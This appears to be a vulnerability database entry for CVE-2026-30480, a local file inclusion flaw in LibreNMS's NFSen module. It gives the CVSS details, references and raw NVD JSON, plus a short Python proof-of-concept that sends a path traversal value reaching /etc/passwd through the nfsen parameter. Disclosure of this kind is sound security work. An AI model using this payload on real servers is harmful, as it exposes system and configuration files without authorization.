CVE-2026-30480

Description

A Local File Inclusion (LFI) vulnerability in the NFSen module (nfsen.inc.php) of LibreNMS 22.11.0-23-gd091788f2 allows authenticated attackers to include arbitrary PHP files from the server filesystem via path traversal sequences in the nfsen parameter.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

LibreNMS 22.11.0-23-gd091788f2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://target-ip/librenms/html/pages/nfsen.inc.php"

# Attacker needs valid session cookie (Authentication required: PR:L)
session_cookie = "PHPSESSID=attacker_valid_session_id_here"

# Headers
headers = {
    "Cookie": session_cookie,
    "User-Agent": "CVE-2026-30480-Scanner/1.0"
}

# Payload exploiting path traversal in 'nfsen' parameter
# Attempting to include a sensitive file (e.g., /etc/passwd or a config file)
# Note: The vulnerability description specifies including PHP files,
# but LFI often allows reading other file types depending on PHP config.
payload_params = {
    "nfsen": "../../../../../../../../etc/passwd"
}

try:
    response = requests.get(target_url, params=payload_params, headers=headers, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response Content (Snippet):")
        print(response.text[:500]) # Print first 500 chars to verify inclusion
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30480
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30480
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30480/
[4] VulDB https://vuldb.com/cve/CVE-2026-30480
[5] https://github.com/parlakbarann/CVE-2026-30480
[6] https://github.com/parlakbarann/CVE-2026-30480

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30480", "sourceIdentifier": "[email protected]", "published": "2026-04-14T15:16:27.337", "lastModified": "2026-04-17T15:24:57.753", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Local File Inclusion (LFI) vulnerability in the NFSen module (nfsen.inc.php) of LibreNMS 22.11.0-23-gd091788f2 allows authenticated attackers to include arbitrary PHP files from the server filesystem via path traversal sequences in the nfsen parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://github.com/parlakbarann/CVE-2026-30480", "source": "[email protected]"}, {"url": "https://github.com/parlakbarann/CVE-2026-30480", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}